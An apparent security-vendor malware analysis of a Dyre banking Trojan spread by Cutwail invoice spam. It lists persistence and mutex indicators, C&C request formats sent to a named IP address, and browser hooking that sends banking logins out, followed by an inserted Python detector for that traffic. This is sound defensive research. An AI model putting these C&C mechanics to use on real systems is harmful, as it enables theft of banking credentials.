
Analysis of a New Banking Trojan Spammed by Cutwail

The Cutwail spambot has a long history of sending spam with attached malicious files such as Zbot, Blackhole Exploit Kit and Cryptolocker. Another trick in Cutwail's portfolio is to use links pointing to popular file hosting services. Over the past weeks, we have observed spam that claims to be an unpaid invoice from a certain bank.

Figure: Influx of Invoice Spam Campaign detected by Trustwave Secure Email Gateway

Currently, one of the most common themes in malicious spam campaigns is a claimed invoice or product order, delivered either as a ZIP file attachment or as a link to a ZIP/RAR file hosted on the web. This high-volume campaign contains links to the file sharing services Dropbox and Cubby. The hosted files are ZIP archives with filenames such as invoice_<digit>.zip and document_<digit>.zip.


Malware Payload

After downloading and extracting the malware, we noticed that it uses an Adobe PDF icon to trick users into believing it is a harmless portable document file. When run, the executable drops a copy of itself into the Windows %AppData% (application data) directory as googleupdaterr.exe. It then creates an autorun registry entry so that it executes at Windows startup:

HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run
GoogleUpdate = "%AppData%\googleupdaterr.exe"

Code stored in the malware's body is then injected into Explorer.exe. The malware also creates an infection marker in the Explorer.exe process by creating a mutex named "RangisMutex5".


Antivirus vendors have dubbed the loader of this new banking Trojan "Dyranges" or "Trojan Dyzap", and the same names are applied to the DLL code injected into explorer.exe. The detection name was perhaps taken from a PDB path found in the malware body:

Figure: The malware's PDB path, from a project named DYRE. Interestingly, "zapuskator2.pdb" is a Russian rendering of "executer2.pdb".

A configuration file named userdata.dat is then dropped in the %AppData% directory containing the BotID, encrypted configuration and a Boolean variable named "AUTOBACKCONN". We assume that setting AUTOBACKCONN to True enables the persistent connection of the bot to its command and control server.


Right after installation, the Trojan sends the following GET requests to its command and control server at the IP address 192.99.6.61. Here is the sequence of communication with the server:

  1. The first GET request is the "publickey" request, using the format "/cho1017/<botid>/5/publickey/".
  2. The bot then reports the OS version of the infected system to its C&C server, using the format "/cho1017/<botid>/0/<Windows Version>/".
  3. Then comes an unknown GET request, "/58/1/", after which the C&C server replies with the ThreadID.


After the initial server handshake, the Trojan tries to maintain connectivity to its server through an ongoing GET request using the format:

GET /cho1017/<botid>/1/<base64 data>/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61
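As an added defender-side example (not code from the original post), the detector below recognises the handshake sequence and the keepalive request described above in simplified proxy-log lines. The log lines, the bot ID EXAMPLEBOT01 and the Windows version string are constructed; the path prefix, command codes, User-Agent and C&C address are those given in the post.

```python
import re
from typing import Dict, List, Optional

# Path format observed in the post: /cho1017/<botid>/<code>/<argument>/
C2_PATH = re.compile(r"^/cho1017/(?P<botid>[^/]+)/(?P<code>\d+)/(?P<arg>.*?)/?$")
# Meaning of the numeric code, as described in the post.
STAGE = {"5": "publickey-request", "0": "os-version-report", "1": "keepalive"}
C2_USER_AGENT = "Wget/1.9"  # hard-coded User-Agent sent by the bot

# Constructed sample log (not real traffic): "<client> <method> <path> <user-agent> <host>"
SAMPLE_LOG = """\
10.0.0.5 GET /cho1017/EXAMPLEBOT01/5/publickey/ Wget/1.9 192.99.6.61
10.0.0.5 GET /cho1017/EXAMPLEBOT01/0/Win_7_SP1/ Wget/1.9 192.99.6.61
10.0.0.5 GET /58/1/ Wget/1.9 192.99.6.61
10.0.0.5 GET /cho1017/EXAMPLEBOT01/1/dGVzdA==/ Wget/1.9 192.99.6.61
10.0.0.7 GET /index.html Mozilla/5.0 www.example.com
"""


def classify_request(path: str, user_agent: str) -> Optional[Dict[str, str]]:
    """Return a finding if the request matches the bot's C&C pattern, else None."""
    m = C2_PATH.match(path)
    if m:
        code = m.group("code")
        return {"botid": m.group("botid"),
                "stage": STAGE.get(code, f"unknown-code-{code}"),
                "arg": m.group("arg")}
    # The third handshake request (/58/1/) carries no botid in the path, so the
    # unusual User-Agent is the only thing left to match on (lower confidence:
    # a legitimate wget user could trigger it too).
    if user_agent == C2_USER_AGENT:
        return {"botid": "?", "stage": "wget-ua-only", "arg": path}
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Scan simplified proxy-log lines and collect every C&C-looking request."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:  # skip malformed lines rather than crash
            continue
        client, _method, path, user_agent, host = parts
        finding = classify_request(path, user_agent)
        if finding:
            finding.update(client=client, host=host)
            findings.append(finding)
    return findings
```

Correlating the four findings from one client in order (publickey, OS report, ThreadID request, keepalive) gives a higher-confidence alert than any single request.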


This banking Trojan hooks Google Chrome, Firefox or Internet Explorer browsers. This browser hooking function enables the Trojan to intercept user searches, browser cookies and sensitive banking information.


The Trojan then monitors a list of banking websites. When a victim visits a banking website being monitored, the information entered by the victim is intercepted and sent to the cybercriminal's server. The snippet of code below is the function where the Trojan monitors various banking URLs and where the intercepted data is sent to a remote IP address at port 12081.


The packet capture below shows the POST request intercepted by the Trojan right after a log-in to a monitored banking website. The POST data, which includes the login credentials and cookies, is sent to the cybercriminal's server.


Acting as a man-in-the-middle, the Trojan sends the intercepted POST data to the cybercriminal's IP address. But the data is also sent through the normal SSL encrypted tunnel between the victim's browser and the bank's web server which hides the suspicious activity going on in the background.


As of this writing, the offending IP address is offline. We are not sure whether it was taken down or the cybercriminal moved to a different server. According to our intelligence, however, the attacker's IP address was linked to an underground drop ship service, Global Blackpoint, a service popular with carders (and other scammers). It also hosts various phishing pages targeting banking institutions.

Figure: Global Blackpoint Login Panel

To wrap up, we always advise users to be wary when clicking links in emails. Extra scrutiny should be placed on links to common file sharing websites such as Dropbox and Cubby, especially now that cybercriminals have started to utilize them for hosting their malware. Trustwave Secure Email Gateway users are protected from this malicious spam campaign.
